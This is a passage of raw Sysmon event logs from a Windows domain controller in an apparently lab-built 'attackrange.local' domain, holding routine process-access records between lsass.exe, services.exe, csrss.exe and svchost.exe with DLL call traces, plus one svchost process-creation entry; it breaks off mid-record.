10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.844{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.844{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:16.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:16.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.574{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.574{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.574{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.574{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.574{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.574{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.558{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-169F-5F84-0A00-000000007F01}856948C:\Windows\system32\services.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.517{5D479F2C-16AB-5F84-2500-000000007F01}3032C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:15.512{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\S